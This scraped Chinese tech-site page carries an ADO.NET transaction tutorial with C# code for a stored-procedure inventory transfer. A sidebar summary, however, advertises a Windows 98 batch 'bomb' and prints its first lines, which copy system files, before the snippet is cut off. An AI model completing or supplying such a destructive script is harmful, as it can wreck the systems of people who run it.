当前位置:首页 » 服务器技术
开发技术指南» 文章正文
    引言:
 

 

 ·我也编炸弹    »显示摘要«
    摘要: 很多网友问我,有什么好炸弹,如何炸计算机等之类的话。我也抱着帮朋友入门的思想,用几分钟写了一个批除理炸弹, (只对windows98有用)。 将下面源程序另存为feng.bat --------------------------------------- @rem @echo off smartdrv copy c:\windows\system\vmm32.vxd c:\windows\system\vmm32\vmm32.vxd re......
 ·文件系统实现文档 - full    »显示摘要«
    摘要: 备注 幻灯片放映 大纲 1 文件系統 peng lei 2 系統功能 支持 fat12/fat16/fat32 支持長文件名 底層對文件名採用到 unicode 提供兼容當前系統的 ascii文件名接口 提供一套使用 unicode......


在ADO.NET中使用事务保护数据的完整性(4)
实施事务

using system; 【相关文章:第四章 账号和组管理(Solaris认证

既然我们已经看了类与成员,让我们来看一下基本的实施情况.接下来的代码是一个简单的情况,使用事务来保证两个存储过程-一个从表中删除库存,另一个增加库存在另个表中,或同时执行,或失败. 【扩展阅读:DirectX发展回顾

using system.drawing; 【扩展信息:第四章 账号和组管理(续3)(Solar

using system.collections;

using system.componentmodel;

using system.windows.forms;

using system.data;

using system.data.sqlclient;

using system.data.sqltypes;

…public void sptransaction(int partid, int numbermoved, int siteid)

{

   // create and open the connection.

   sqlconnection conn = new sqlconnection();

   string connstring = "server=sqlinstance;database=test;"

      + "integrated security=sspi";

   conn.connectionstring = connstring;

   conn.open();

   // create the commands and related parameters.

   // cmddebit debits inventory from the warehouseinventory

   // table by calling the debitwarehouseinventory

   // stored procedure.

   sqlcommand cmddebit =

      new sqlcommand("debitwarehouseinventory", conn);

   cmddebit.commandtype = commandtype.storedprocedure;


...   下一页
    摘要:使用vs.net开发web services 简明教程 hbzxf(阿好) http://www.cnblogs.com/hbzxf 目录索引: 1 使用visual studio.net 创建 web services 2 在 web forms 中调用 web services 3 在 windows forms中调用 web services 之所以称为简明教程,就是把简单的操作步骤一一列出,使初学者容易上手,......
» 本期热门文章:

©2000-2007 All Rights Reserved. 最佳浏览:1024X768 MSIE